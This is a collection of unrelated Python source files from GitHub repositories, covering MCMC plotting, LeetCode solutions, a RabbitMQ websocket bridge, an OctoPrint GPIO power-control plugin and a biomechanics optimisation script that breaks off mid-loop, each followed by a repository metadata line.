    # Default: a "Figures" directory two levels above the pickle file.
    sPathToSaveDir = '/'.join(sPathToPickleMCMC.split('/')[:-2]) + '/Figures/'
MCMC_Name = sPathToPickleMCMC.split('/')[-1].split('.')[0]
############# load MCMC sampler #############
# Load inside a context manager so the pickle file handle is closed promptly
# (the original bare pickle.load(open(...)) leaked the handle).
with open(sPathToPickleMCMC, 'rb') as fPickle:
    MCMC_Results = pickle.load(fPickle)
sampler = MCMC_Results['sampler']
ndim = sampler.__dict__['dim']                 # number of fit parameters
niterations = sampler.__dict__['iterations']   # MCMC iterations per walker
nwalkers = sampler.__dict__['k']               # number of walkers
# chain is indexed [walker, iteration, parameter] by the plotting loop below.
chain = sampler.__dict__['_chain']
TotalEvents = chain.shape[1]  # NOTE(review): equals niterations and is unused below
############# get parameter information #############
ParInfo = FormPars.GetParInfo()
ParNames = [ParInfo[i][0] for i in range(ndim)] # parameter names
ParDescs = [ParInfo[i][1] for i in range(ndim)] # parameter description
ParUnits = [ParInfo[i][2] for i in range(ndim)] # parameter units
############# set plot information #############
colors = ['k', 'b','r','g','y','darkblue', 'darkgreen', 'chocolate', 'm', 'gold', 'purple', 'c', 'violet', 'r', 'k', 'darkorange', 'forestgreen', 'lightseagreen', 'rebeccapurple']
Iterations = np.linspace(1, niterations, niterations)
fig, ax = plt.subplots(int(ndim/2. + 0.5), 2, sharex=True, figsize=(20,20))
ax = ax.T.reshape((-1))
############# plot walkers vs. iteration for each parameter #############
for i in range(ndim):
    # One translucent trace per walker so the burn-in spread is visible.
    ax[i].plot(Iterations, chain[:, :, i].T, color=colors[i], linewidth=1, alpha=0.1)
    # set units for ylabel if exist
    if ParUnits[i] != '':
        yLabel = ParNames[i] + ' [' + ParUnits[i] + ']'
    else:
        yLabel = ParNames[i]
    ax[i].set_ylabel(yLabel)
    # label x-axis for bottom plots
    if (i + 1) == len(ax)/2:
        ax[i].set_xlabel('Iterations')
    ax[i].yaxis.get_major_formatter().set_powerlimits((-3,3))
ax[-1].set_xlabel('Iterations')
plt.savefig(sPathToSaveDir + MCMC_Name + '_BurnIn.png', format='png')
plt.show()
| zachgreene/ElectronLifetime | PythonCodeELMCMC/PlotBurnIn.py | PlotBurnIn.py | py | 2,187 | python | en | code | 0 | github-code | 90 |
# String rearrangement: output the alphabet characters in sorted order,
# followed by the sum of all digit characters.
string = "K1KA5CB7"

number = sum(int(ch) for ch in string if ch.isdigit())
result = sorted(ch for ch in string if not ch.isdigit())
result.append(str(number))

print("".join(result))
| EcoFriendlyAppleSu/algo | algorithm/implementation/practice/StringRearrange.py | StringRearrange.py | py | 263 | python | en | code | 0 | github-code | 90 |
class Solution(object):
    def topKFrequent(self, nums, k):
        """
        Return the k most frequent elements of nums.

        :type nums: List[int]
        :type k: int
        :rtype: List[int]
        """
        from collections import Counter
        # Counter tallies frequencies in one O(n) pass and most_common sorts
        # by count descending -- replacing the original O(n*m) list.count()
        # loop, the pointless int->str->int round-trip, and a leftover debug
        # print of the frequency dict.
        return [value for value, _ in Counter(nums).most_common(k)]
| feux-follets/neetcode | 1_arrays_and_hashing/top_k_frequent_elements.py | top_k_frequent_elements.py | py | 588 | python | en | code | 1 | github-code | 90 |
30933348167 | import json
import os
import sys
from pathlib import Path
## ADJUSTABLE VARIABLES ##
# FORCE_DEBUG should be a boolean (True or False, no quotes)
# Note: Environment variables can only store strings. Convert this to string if it has to be an environment variable.
FORCE_DEBUG = True
# HEADER_FILL should be a string array
# The first value is the background color, the second value is the font color, and the third value is the fill type.
# EDIT THIS AS NEEDED
HEADER_FILL = ['4CAF50', '4CAF50', 'solid']
# LOG_DIR should be a string
# This would be in the root directory where this __main__.py file is located.
LOG_DIR = 'logs'
# PROCESSED_DIR is used to set the processed directory that will be created in the found PDF directory.
# This is where the processed Excel files will be stored.
PROCESSED_DIR = 'processed'
# CELL_PHONE should be a string array
# EDIT THIS AS NEEDED
CELL_PHONE = ['Cell', 'Mobile', 'iPhone']
# MAIN_PHONE should be a string array
# EDIT THIS AS NEEDED
MAIN_PHONE = ['Tel', 'Main', 'Home', 'Office', 'Phone', 'Telephone']
## DO NOT CHANGE ANYTHING BELOW THIS LINE ##
# This sets the environment variables for the program.
# Lists are serialized as JSON; everything else is passed through str()
# because environment variables can only hold strings.
os.environ['CELL_PHONE'] = json.dumps(CELL_PHONE)
os.environ['FORCE_DEBUG'] = str(FORCE_DEBUG)
os.environ['HEADER_FILL'] = json.dumps(HEADER_FILL)
os.environ['MAIN_PHONE'] = json.dumps(MAIN_PHONE)
os.environ['LOG_DIR'] = str(LOG_DIR)
os.environ['PROCESSED_DIR'] = str(PROCESSED_DIR)
os.environ['TK_SILENCE_DEPRECATION'] = '1'  # silence the macOS Tk deprecation banner
# This sets the root directory to the parent directory of this __main__.py file.
# Appending it to sys.path makes the `core` package importable below.
current_path = Path(__file__).resolve()
parent_path = current_path.parent.parent
sys.path.append(str(parent_path))
# This is the auto-start for the program.
if __name__ == "__main__":
    from core.process import batch_convert
    from core.filer import select_folder
    # Clear the terminal, then batch-convert the user-selected folder.
    os.system('cls' if os.name == 'nt' else 'clear')
    batch_convert(select_folder())
| AznIronMan/invoice-pdf-to-excel-batch-converter | __main__.py | __main__.py | py | 1,929 | python | en | code | 0 | github-code | 90 |
18924620575 | # """Receive messages over from RabbitMQ and send them over the websocket."""
# import pika
# connection = pika.BlockingConnection(
# pika.ConnectionParameters(host='localhost')
# )
# channel = connection.channel()
# channel.exchange_declare(
# exchange='fe662fd9de834fc', exchange_type='fanout'
# )
# # exclusive means the queue should be deleted once the connection is closed
# result = channel.queue_declare(queue="", exclusive=True)
# # result = channel.queue_declare(queue="")
# queue_name = '' # random queue name generated by RabbitMQ
# # print('queue_name:', queue_name)
# channel.queue_bind(exchange='fe662fd9de834fc', queue=queue_name)
# # print('listening for messages...')
# # x = channel.consume(queue_name)
# # print('channel.consume:', [x])
# # for item, item2 in channel.consume(queue_name):
# # print(item)
# # while True:
# # print('inside while')
# # for method_frame, _, body in channel.consume(queue_name):
# # print('inside for loop')
# # try:
# # print(body)
# # except OSError as error:
# # print(error)
# # else:
# # channel.basic_ack(method_frame.delivery_tag)
# for method_frame, properties, body in channel.consume(queue_name):
# # Display the message parts
# print(method_frame)
# print(properties)
# print(body)
# # Acknowledge the message
# channel.basic_ack(method_frame.delivery_tag)
# # Escape out of the loop after 10 messages
# if method_frame.delivery_tag == 10:
# break
# # Cancel the consumer and return any pending messages
# requeued_messages = channel.cancel()
# print('Requeued %i messages' % requeued_messages)
# # Close the channel and the connection
# channel.close()
# connection.close()
#################################################### AGAIN #############################################
"""Receive messages over from RabbitMQ and send them over the websocket."""
import sys
import pika
import uwsgi
def application(env, start_response):
    """uWSGI entry point: bridge a RabbitMQ fanout exchange to a websocket.

    The exchange name is taken from the request path.  An exclusive queue is
    declared and bound to it, the websocket handshake is performed, and every
    message consumed from the queue is forwarded to the client.  A keepalive
    PING/PONG is scheduled every 30 seconds; when the client disconnects the
    process exits so uWSGI can respawn a fresh worker.

    Fixes: the original placed the docstring *after* a debug print, so it was
    a no-op string expression rather than a docstring; leftover debug prints
    were removed.
    """
    connection = pika.BlockingConnection(
        pika.ConnectionParameters(host='localhost')
    )
    channel = connection.channel()
    # Exchange name = URL path with the slashes stripped.
    exchange = env['PATH_INFO'].replace('/', '')
    channel.exchange_declare(
        exchange=exchange, exchange_type='fanout'
    )
    # exclusive means the queue should be deleted once the connection is closed
    result = channel.queue_declare(queue='', exclusive=True)
    queue_name = result.method.queue  # random queue name generated by RabbitMQ
    channel.queue_bind(exchange=exchange, queue=queue_name)

    uwsgi.websocket_handshake(
        env['HTTP_SEC_WEBSOCKET_KEY'],
        env.get('HTTP_ORIGIN', '')
    )

    def keepalive():
        """Keep the websocket connection alive (called every 30 seconds)."""
        try:
            uwsgi.websocket_recv()
            connection.call_later(30, keepalive)
        except OSError as error:
            connection.close()
            print(error)
            sys.exit(1)  # Kill process and force uWSGI to Respawn

    keepalive()

    while True:
        for method_frame, _, body in channel.consume(queue_name):
            try:
                uwsgi.websocket_send(body)
            except OSError as error:
                print(error)
                sys.exit(1)
            else:
                # acknowledge the message only after a successful send
                channel.basic_ack(method_frame.delivery_tag)
####################################### websocket after uwsgi installation #################################
| Prodip007/realtime_chat_app | websocket.py | websocket.py | py | 3,827 | python | en | code | 0 | github-code | 90 |
25091128159 | # coding=utf-8
from __future__ import absolute_import
import octoprint.plugin
import octoprint.printer
from octoprint.util import RepeatedTimer
from octoprint.events import Events
import pigpio
# Main class used to interface with pigpio
class OctoPiBoxControl:
    """Wrap all pigpio access for the OctoPiBox hardware: the printer/spare
    power outlet pins, the debounced push buttons that toggle them, and the
    RGB status LED driven by a repeating pigpio waveform."""

    def __init__(self, parent, printer_pin, spare_pin, printer_button_pin, spare_button_pin, debounce, powercallbackfunction):
        self._parent = parent
        self._pi = pigpio.pi()
        self._powercallbackfunction = powercallbackfunction
        self._common_init(printer_pin, spare_pin, printer_button_pin, spare_button_pin, debounce)
        # Power pin reports both edges; buttons fire on press (falling edge,
        # since the inputs are pulled up).
        self._powercallback = self._pi.callback(self._printer_pin, pigpio.EITHER_EDGE, self._powercallbackfunction)
        self._printerbuttoncallback = self._pi.callback(self._printer_button_pin, pigpio.FALLING_EDGE, self._buttoncallbackfunction)
        self._sparebuttoncallback = self._pi.callback(self._spare_button_pin, pigpio.FALLING_EDGE, self._buttoncallbackfunction)
        self._inited = True

    def _common_init(self, printer_pin, spare_pin, printer_button_pin, spare_button_pin, debounce):
        """Configure the outlet pins as outputs and the button pins as
        pulled-up inputs with a glitch (debounce) filter."""
        self._printer_pin = printer_pin
        self._spare_pin = spare_pin
        self._pi.set_mode(self._printer_pin, pigpio.OUTPUT)
        self._pi.set_mode(self._spare_pin, pigpio.OUTPUT)
        self._printer_button_pin = printer_button_pin
        self._spare_button_pin = spare_button_pin
        self._pi.set_mode(self._printer_button_pin, pigpio.INPUT)
        self._pi.set_pull_up_down(self._printer_button_pin, pigpio.PUD_UP)
        filter_error = self._pi.set_glitch_filter(self._printer_button_pin, debounce)
        if filter_error != 0:
            self._parent.logger.info("Glitch filter error. Pin: {}, Debounce: {}, Error: {}.".format(self._printer_button_pin, debounce, filter_error))
        self._pi.set_mode(self._spare_button_pin, pigpio.INPUT)
        self._pi.set_pull_up_down(self._spare_button_pin, pigpio.PUD_UP)
        filter_error = self._pi.set_glitch_filter(self._spare_button_pin, debounce)
        if filter_error != 0:
            self._parent.logger.info("Glitch filter error. Pin: {}, Debounce: {}, Error: {}.".format(self._spare_button_pin, debounce, filter_error))

    def _buttoncallbackfunction(self, gpio, level, tick):
        """pigpio button callback: toggle the outlet paired with the button."""
        if gpio == self._printer_button_pin:
            if self._pi.read(self._printer_pin) == 1:
                self._pi.write(self._printer_pin, 0)
            else:
                self._pi.write(self._printer_pin, 1)
        elif gpio == self._spare_button_pin:
            if self._pi.read(self._spare_pin) == 1:
                self._pi.write(self._spare_pin, 0)
            else:
                self._pi.write(self._spare_pin, 1)

    def restart(self, printer_pin, spare_pin, printer_button_pin, spare_button_pin, debounce):
        """Re-register all callbacks after a settings change (pins may differ)."""
        self._powercallback.cancel()
        self._printerbuttoncallback.cancel()
        self._sparebuttoncallback.cancel()
        self._common_init(printer_pin, spare_pin, printer_button_pin, spare_button_pin, debounce)
        self._powercallback = self._pi.callback(self._printer_pin, pigpio.EITHER_EDGE, self._powercallbackfunction)
        self._printerbuttoncallback = self._pi.callback(self._printer_button_pin, pigpio.FALLING_EDGE, self._buttoncallbackfunction)
        self._sparebuttoncallback = self._pi.callback(self._spare_button_pin, pigpio.FALLING_EDGE, self._buttoncallbackfunction)

    def init_status_LED(self, red_pin, green_pin, blue_pin):
        """Assign the RGB LED pins and precompute the per-color GPIO bitmasks
        used when building waveform pulses."""
        self._status_red_pin = red_pin
        self._status_green_pin = green_pin
        self._status_blue_pin = blue_pin
        self.clear_status_LED()
        self._status_LED_colors = {
            "RED": 1<<self._status_red_pin,
            "GREEN": 1<<self._status_green_pin,
            "BLUE": 1<<self._status_blue_pin,
            "YELLOW": (1<<self._status_red_pin)+(1<<self._status_green_pin),
            "MAGENTA": (1<<self._status_red_pin)+(1<<self._status_blue_pin),
            "CYAN": (1<<self._status_blue_pin)+(1<<self._status_green_pin),
            "WHITE": (1<<self._status_red_pin)+(1<<self._status_green_pin)+(1<<self._status_blue_pin),
            "OFF": 0
        }

    def restart_status_LED(self, red_pin, green_pin, blue_pin):
        """Re-init the LED on (possibly new) pins and restore its last state."""
        old_status_LED_state = self._status_LED_state;
        self.init_status_LED( red_pin, green_pin, blue_pin)
        self.set_status_LED_color( old_status_LED_state[0], old_status_LED_state[1], old_status_LED_state[2])

    def clear_status_LED(self):
        """Stop and clear any running waveform and turn all LED pins off."""
        self._pi.wave_tx_stop()
        self._pi.wave_clear()
        self.pin_off(self._status_red_pin)
        self.pin_off(self._status_green_pin)
        self.pin_off(self._status_blue_pin)
        self._status_LED_state = [ "OFF", "OFF", "OFF"]

    def set_status_LED_color(self, color1, color2, blink_rate):
        """Alternate the LED between color1 and color2 at the given rate
        ("FAST" = 100ms steps, "SLOW" = 500ms; anything else shows color1
        solid).  Implemented as a two-pulse repeating pigpio waveform."""
        blink_flash = []
        if blink_rate =="FAST":
            blink_ms = 100000
        elif blink_rate == "SLOW":
            blink_ms = 500000
        else:
            # Solid color: force both steps to color1 (pulse length in µs).
            blink_ms = 1000000
            color2 = color1
            blink_rate = "OFF"
        step1_on_pins = self._status_LED_colors[color1]
        step1_off_pins = self._status_LED_colors[color1] ^ self._status_LED_colors["WHITE"]
        step2_on_pins = self._status_LED_colors[color2]
        step2_off_pins = self._status_LED_colors[color2] ^ self._status_LED_colors["WHITE"]
        blink_flash.append(pigpio.pulse(step1_on_pins,step1_off_pins,blink_ms))
        blink_flash.append(pigpio.pulse(step2_on_pins,step2_off_pins,blink_ms))
        self._pi.wave_add_generic(blink_flash)
        self._status_LED_wave = self._pi.wave_create()
        self._pi.wave_send_repeat(self._status_LED_wave)
        self._status_LED_state = [ color1, color2, blink_rate]

    def pin_on( self, pin):
        """Drive the given GPIO pin high."""
        self._pi.write( pin, 1)

    def pin_off( self, pin):
        """Drive the given GPIO pin low."""
        self._pi.write( pin, 0)

    def pin_value( self, pin):
        """Return the current level (0/1) of the given GPIO pin."""
        return self._pi.read( pin)

    def cancel(self):
        """Tear down all callbacks and the pigpio connection (idempotent)."""
        if self._inited:
            self._inited = False
            self._powercallback.cancel()
            self._printerbuttoncallback.cancel()
            self._sparebuttoncallback.cancel()
            self._pi.stop()
class OctoPiBoxPlugin(octoprint.plugin.TemplatePlugin,
                      octoprint.plugin.AssetPlugin,
                      octoprint.plugin.SimpleApiPlugin,
                      octoprint.plugin.EventHandlerPlugin,
                      octoprint.plugin.SettingsPlugin,
                      octoprint.plugin.StartupPlugin):
    """OctoPrint plugin side of the OctoPiBox: wires printer events and the
    simple API to the OctoPiBoxControl GPIO layer (power outlets, buttons,
    status LED) and implements the automatic power-off countdown."""

    def get_settings_defaults(self):
        """Default GPIO pin assignments and power-off timer settings."""
        return dict(
            enabled=False,
            timer_seconds=600,
            printer_pin=17,
            spare_pin=4,
            printer_button_pin=6,
            printer_button_enable_pin=18,
            spare_button_pin=5,
            spare_button_enable_pin=27,
            button_debounce=200,
            status_red_pin=22,
            status_green_pin=23,
            status_blue_pin=24 )

    def on_settings_save(self, data):
        """Persist settings, then re-apply them to the GPIO layer."""
        octoprint.plugin.SettingsPlugin.on_settings_save(self, data)
        self._load_settings()
        self._octopibox.restart( self._printer_pin, self._spare_pin, self._printer_button_pin, self._spare_button_pin, self._button_debounce)
        self._octopibox.restart_status_LED(self._status_red_pin, self._status_green_pin, self._status_blue_pin)

    def on_after_startup(self):
        """Create the GPIO controller, enable the buttons and show the
        initial (disconnected) LED state."""
        self._timeout_value = None
        self._timer = None
        self._load_settings()
        self._octopibox = OctoPiBoxControl(self, self._printer_pin, self._spare_pin, self._printer_button_pin, self._spare_button_pin, self._button_debounce, self._powercallbackfunction)
        self._update_power_status()
        self._octopibox.pin_on(self._printer_button_enable_pin)
        self._octopibox.pin_on(self._spare_button_enable_pin)
        self._octopibox.init_status_LED(self._status_red_pin, self._status_green_pin, self._status_blue_pin)
        self._set_status_LED("DISCONNECTED")

    def on_shutdown(self):
        """Disable the buttons and release all GPIO resources."""
        self._octopibox.pin_off(self._printer_button_enable_pin)
        self._octopibox.pin_off(self._spare_button_enable_pin)
        self._octopibox.clear_status_LED()
        self._octopibox.cancel()

    def get_assets(self):
        return dict(js=["js/octopibox.js"])

    def get_template_configs(self):
        return [
            dict(type="settings",
                 name="OctoPiBox Configuration",
                 custom_bindings=False)
        ]

    def get_api_commands(self):
        # Both commands take no parameters.
        return dict(autopoweroff=[],
                    abort=[])

    def on_api_command(self, command, data):
        """Simple API: 'abort' cancels a running power-off countdown;
        'autopoweroff' starts one."""
        import flask
        # NOTE(review): the flask import appears unused here -- verify.
        if command == "abort":
            self._timer.cancel()
            self._timer = None
            self._set_status_LED("CONNECTED")
            self._logger.info("Automatic Power-Off aborted.")
        elif command == "autopoweroff":
            self._logger.debug("Automatic Printer Power-off called via API. Starting timer.")
            self._start_auto_power_off_timer()

    def on_event(self, event, payload):
        """Map OctoPrint printer events to LED states, button enablement and
        the automatic power-off countdown."""
        #self._logger.info("Event triggered: {}".format(event))
        if event == Events.PRINT_DONE:
            self._octopibox.pin_on(self._printer_button_enable_pin)
            if not self._enabled:
                self._logger.debug("Print complete. Automatic Printer Power-off is currently DISABLED.")
                self._set_status_LED("CONNECTED")
                return
            if self._timer is not None:
                # A countdown is already running; do not start another.
                return
            self._logger.debug("Print complete. Automatic Printer Power-off is ENABLED. Starting timer.")
            self._start_auto_power_off_timer()
        elif event == Events.CONNECTED:
            self._set_status_LED("CONNECTED")
        elif event == Events.DISCONNECTED:
            self._set_status_LED("DISCONNECTED")
        elif event == Events.PRINT_STARTED:
            # Lock out the power button while printing.
            self._octopibox.pin_off(self._printer_button_enable_pin)
            self._set_status_LED("PRINTING")
        elif event == Events.PRINT_FAILED:
            self._octopibox.pin_on(self._printer_button_enable_pin)
            self._set_status_LED("ERROR")
        elif event == Events.PRINT_CANCELLED:
            self._octopibox.pin_on(self._printer_button_enable_pin)
            self._set_status_LED("ERROR")
        elif event == Events.CLIENT_OPENED:
            self._update_power_status()

    def _start_auto_power_off_timer(self):
        """Start the 1-second-tick countdown that ends in _printeroff()."""
        self._timeout_value = self._settings.get_int(['timer_seconds'])
        # Clamp out-of-range settings to the 600s default.
        # NOTE(review): bitwise `|` works on these booleans but `or` is the
        # conventional operator here.
        if (self._timeout_value < 30) | (self._timeout_value > 1800):
            self._timeout_value = 600
        self._logger.debug("Automatic Printer Power-off started: {} seconds.".format(self._timeout_value))
        self._set_status_LED("POWERINGOFF")
        self._timer = RepeatedTimer(1, self._timer_task)
        self._timer.start()
        self._plugin_manager.send_plugin_message(self._identifier, dict(type="timeout", timeout_value=self._timeout_value))

    def _load_settings(self):
        """Cache all plugin settings into instance attributes."""
        self._enabled = self._settings.get_boolean(['enabled'])
        self._printer_pin = self._settings.get_int(['printer_pin'])
        self._spare_pin = self._settings.get_int(['spare_pin'])
        self._printer_button_pin = self._settings.get_int(['printer_button_pin'])
        self._printer_button_enable_pin = self._settings.get_int(['printer_button_enable_pin'])
        self._spare_button_pin = self._settings.get_int(['spare_button_pin'])
        self._spare_button_enable_pin = self._settings.get_int(['spare_button_enable_pin'])
        self._button_debounce = self._settings.get_int(['button_debounce'])
        self._status_red_pin = self._settings.get_int(['status_red_pin'])
        self._status_green_pin = self._settings.get_int(['status_green_pin'])
        self._status_blue_pin = self._settings.get_int(['status_blue_pin'])

    def _timer_task(self):
        """One countdown tick: notify the UI; power off when it reaches 0."""
        self._timeout_value -= 1
        self._plugin_manager.send_plugin_message(self._identifier, dict(type="timeout", timeout_value=self._timeout_value))
        if self._timeout_value <= 0:
            self._timer.cancel()
            self._timer = None
            self._printeroff()

    def _powercallbackfunction(self, pin, level, tick):
        """pigpio callback for edges on the printer power pin: disconnect on
        power loss, auto-connect on power-on."""
        if pin == self._printer_pin:
            self._logger.debug("Printer pin {} level changed to {}".format(pin, level))
            self._update_power_status()
            if level == 0:
                current_connection = self._printer.get_current_connection()
                if current_connection[0] != "Closed":
                    self._logger.debug("Printer connection found: {}".format(current_connection[0:3]))
                    self._printer.disconnect()
                    self._logger.debug("Printer disconnected after power-off.")
                # NOTE(review): _timeout_value may still be None here;
                # `None > 0` raises TypeError on Python 3 -- verify runtime.
                if self._timeout_value > 0:
                    self._timer.cancel()
                    self._timer = None
                    self._timeout_value = 0
                    self._plugin_manager.send_plugin_message(self._identifier, dict(type="close_popup"))
            elif level == 1:
                self._logger.debug("Printer power-on detected.")
                self._set_status_LED("CONNECTING")
                self._printer.connect()
                self._logger.debug("Printer auto-connect after power-on attempted.")

    def _printeroff(self):
        """Disconnect the printer, then cut power to both outlets."""
        self._logger.debug("Printer disconnect before power-off.")
        self._printer.disconnect()
        self._logger.info("Powering off printer on pin {}.".format( self._printer_pin))
        self._octopibox.pin_off(self._printer_pin)
        self._logger.debug("Powering off spare outlet on pin {}.".format( self._spare_pin))
        self._octopibox.pin_off(self._spare_pin)

    def _update_power_status(self):
        """Push the current outlet state ("On"/"Off") to connected clients."""
        printer_power_status = ["Off", "On"]
        printer_power_status_text = printer_power_status[ self._octopibox.pin_value(self._printer_pin)]
        self._plugin_manager.send_plugin_message(self._identifier, dict(type="updatePowerStatus", power_status_value=printer_power_status_text))
        self._logger.debug("Data message sent from {} for power update to {}.".format(self._identifier, printer_power_status_text))

    def _set_status_LED(self, status="DISCONNECTED"):
        """Translate a plugin state name into an LED color/blink pattern."""
        self._octopibox.clear_status_LED()
        if status=="DISCONNECTED":
            self._octopibox.set_status_LED_color("YELLOW", "OFF", "OFF")
        elif status == "CONNECTED":
            self._octopibox.set_status_LED_color("GREEN", "OFF", "OFF")
        elif status == "PRINTING":
            self._octopibox.set_status_LED_color("RED", "OFF", "OFF")
        elif status == "CONNECTING":
            self._octopibox.set_status_LED_color("GREEN", "YELLOW", "SLOW")
        elif status == "POWERINGOFF":
            self._octopibox.set_status_LED_color("RED", "YELLOW", "SLOW")
        elif status == "ERROR":
            self._octopibox.set_status_LED_color("RED", "OFF", "FAST")
        elif status == "OFF":
            self._octopibox.set_status_LED_color("OFF", "OFF", "OFF")
        else:
            self._octopibox.set_status_LED_color("OFF", "OFF", "OFF")

    ##~~ Softwareupdate hook
    def get_update_information(self):
        # Define the configuration for your plugin to use with the Software Update
        # Plugin here. See https://github.com/foosel/OctoPrint/wiki/Plugin:-Software-Update
        # for details.
        return dict(
            octopibox=dict(
                displayName="OctoPiBox Plugin",
                displayVersion=self._plugin_version,
                # version check: github repository
                type="github_release",
                user="hcomet",
                repo="OctoPrint-OctoPiBox",
                current=self._plugin_version,
                # update method: pip
                pip="https://github.com/hcomet/OctoPrint-OctoPiBox/archive/{target_version}.zip"
            )
        )
# If you want your plugin to be registered within OctoPrint under a different name than what you defined in setup.py
# ("OctoPrint-PluginSkeleton"), you may define that here. Same goes for the other metadata derived from setup.py that
# can be overwritten via __plugin_xyz__ control properties. See the documentation for that.
__plugin_name__ = "OctoPiBox Plugin"
def __plugin_load__():
global __plugin_implementation__
__plugin_implementation__ = OctoPiBoxPlugin()
global __plugin_hooks__
__plugin_hooks__ = {
"octoprint.plugin.softwareupdate.check_config": __plugin_implementation__.get_update_information
}
| hcomet/OctoPrint-OctoPiBox | octoprint_octopibox/__init__.py | __init__.py | py | 14,443 | python | en | code | 0 | github-code | 90 |
73397775976 | # -*- coding: utf-8 -*-
__author__ = 'gzp'
import json
from copy import copy
class ListNode(object):
    """Singly linked list node: a payload value plus a link to the successor."""

    def __init__(self, x):
        # The successor is left unset until the caller wires up the list.
        self.val = x
        self.next = None
class TreeNode:
    """Binary tree node holding a value and optional left/right children."""

    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

    def get_nodes(self):
        """Return this subtree's values in breadth-first (level) order.

        Children that are falsy (``None`` placeholders) are not visited.
        """
        if not self:
            return []
        pending = [self]
        values = []
        cursor = 0
        # Walk the queue with an index cursor instead of popping the head.
        while cursor < len(pending):
            node = pending[cursor]
            cursor += 1
            values.append(node.val)
            if node.left:
                pending.append(node.left)
            if node.right:
                pending.append(node.right)
        return values
class Tree:
    """Factory building a binary tree from a LeetCode-style level-order list.

    ``Tree(nodes)`` accepts a list or a JSON string such as
    ``'[3,5,1,null,2]'`` and returns the root ``TreeNode`` (``None`` for an
    empty list) — it does not return a ``Tree`` instance.

    Bug fixes vs. the previous version:
    * ``_get_first_node`` used to return ``False`` when the list was
      exhausted; ``False is not None`` is true, so spurious
      ``TreeNode(False)`` children were created whenever a level ran out of
      values mid-row.  A dedicated sentinel now marks exhaustion.
    * ``_tree`` used to crash with ``AttributeError`` when a ``None``
      (null placeholder) node was carried into the next level; such
      entries are now skipped.
    """

    # Sentinel meaning "the level-order list is exhausted" — distinct from
    # None, which is a valid placeholder for a missing child.
    _EXHAUSTED = object()

    def __new__(cls, nodes, *args, **kwargs):
        if isinstance(nodes, str):
            nodes = json.loads(nodes)
        if not nodes:
            return None
        root = TreeNode(nodes.pop(0))
        cls._tree(root, nodes)
        return root

    @classmethod
    def _tree(cls, root, nodes):
        """Attach children level by level, consuming ``nodes`` in order."""
        tree_nodes = [root]
        while nodes and tree_nodes:
            tmp = []
            for node in tree_nodes:
                if node is None:
                    # A null placeholder has no children to fill in.
                    continue
                val = cls._get_first_node(nodes)
                if val is not None and val is not cls._EXHAUSTED:
                    node.left = TreeNode(val)
                else:
                    node.left = None
                val = cls._get_first_node(nodes)
                if val is not None and val is not cls._EXHAUSTED:
                    node.right = TreeNode(val)
                else:
                    node.right = None
                tmp.append(node.left)
                tmp.append(node.right)
            tree_nodes = copy(tmp)
        return root

    @classmethod
    def _get_first_node(cls, nodes):
        """Pop and return the next value, or the exhaustion sentinel."""
        if nodes:
            return nodes.pop(0)
        return cls._EXHAUSTED
if __name__ == '__main__':
    # Smoke test: build trees from LeetCode-style level-order strings and
    # print the values back in breadth-first order.
    t1 = Tree('[3,5,1,6,2,9,8,null,null,7,4]')
    print(t1.get_nodes())
    t2 = Tree('[3,5,1,6,7,4,2,null,null,null,null,null,null,9,8]')
    print(t2.get_nodes())
| elfgzp/Leetcode | utils.py | utils.py | py | 1,967 | python | en | code | 1 | github-code | 90 |
18836851102 | # -*- coding: utf-8 -*-
"""
Created on Sun Aug 12 15:32:57 2018
@author: nikhil
"""
# Rewrite '../bacterial_result.txt' in place, appending a per-row "Difference"
# column (row percentage minus the file's reported average) and a final
# population standard deviation line.
file = open('../bacterial_result.txt', 'r+')
content = file.read()
# Rewind so the writes below overwrite the file from the beginning.
file.seek(0)
lines = content.split('\n')
line_cnt = len(lines)
# The last line is expected to look like "... = <average percentage>".
avg_per = float(lines[line_cnt - 1].split('=')[1])
# Re-emit the header row with the extra column title.
file.write(lines[0] + '\tDifference')
diff_sum = 0
cnt = 0
for i in range(1, line_cnt):
    l = lines[i].split('\t\t')
    if len(l) <= 1:
        # Not a data row (blank/summary lines lack the double-tab layout).
        continue
    # Deviation of this row's percentage (4th column) from the average.
    diff = round(float(l[3]) - avg_per, 3)
    # file.write('\n' + lines[i] + '\t\t\t' + str(diff))
    file.write('\n')
    l.append(diff)
    # Fixed-width columns keep the rewritten table aligned.
    file.write(('{:<15} {:<10} {:<18} {:<15} {:<15}'.format(l[0], l[1], l[2], l[3], l[4])))
    # Accumulate squared deviations for the population standard deviation.
    diff_sum += diff**2
    cnt += 1
SD = round((diff_sum / cnt)**0.5, 3)
# Restore the original average line, then append the computed SD.
file.write('\n\n' + lines[line_cnt-1])
file.write('\nStandard Deviation = ' + str(SD))
file.close()
| nik1806/Plant-leaf-infection-detection | standard_deviation.py | standard_deviation.py | py | 861 | python | en | code | 7 | github-code | 90 |
71954599978 | from time import time
import biorbd_casadi as biorbd
from bioptim import Solver, OdeSolver
from .gait.load_experimental_data import LoadData
from .gait.ocp import prepare_ocp, get_phase_time_shooting_numbers, get_experimental_data
def generate_table(out):
    """Solve the gait OCP with two ODE solvers and record solver statistics.

    For each of ``OdeSolver.RK4`` and ``OdeSolver.COLLOCATION`` the optimal
    control problem is built from the experimental gait data, solved with
    IPOPT, and the results (problem sizes, iterations, cost, wall time,
    single-shooting error) are appended to ``out.solver``.

    ``out`` is expected to expose a ``solver`` list and a ``Solver``
    record type — presumably the paper's results-table container; confirm
    against the caller.
    """
    root_path = "/".join(__file__.split("/")[:-1])
    # Define the problem -- model path
    # One model per gait phase (heel strike, flat foot, forefoot, swing).
    biorbd_model = (
        biorbd.Model(root_path + "/models/Gait_1leg_12dof_heel.bioMod"),
        biorbd.Model(root_path + "/models/Gait_1leg_12dof_flatfoot.bioMod"),
        biorbd.Model(root_path + "/models/Gait_1leg_12dof_forefoot.bioMod"),
        biorbd.Model(root_path + "/models/Gait_1leg_12dof_0contact.bioMod"),
    )

    # --- files path ---
    c3d_file = root_path + "/data/normal01_out.c3d"
    q_kalman_filter_file = root_path + "/data/normal01_q_KalmanFilter.txt"
    qdot_kalman_filter_file = root_path + "/data/normal01_qdot_KalmanFilter.txt"
    data = LoadData(biorbd_model[0], c3d_file, q_kalman_filter_file, qdot_kalman_filter_file)

    # --- phase time and number of shooting ---
    # 0.01 s shooting interval.
    phase_time, number_shooting_points = get_phase_time_shooting_numbers(data, 0.01)
    # --- get experimental data ---
    q_ref, qdot_ref, markers_ref, grf_ref, moments_ref, cop_ref, emg_ref = get_experimental_data(data, number_shooting_points, phase_time)

    for i, ode_solver in enumerate([OdeSolver.RK4(), OdeSolver.COLLOCATION()]):
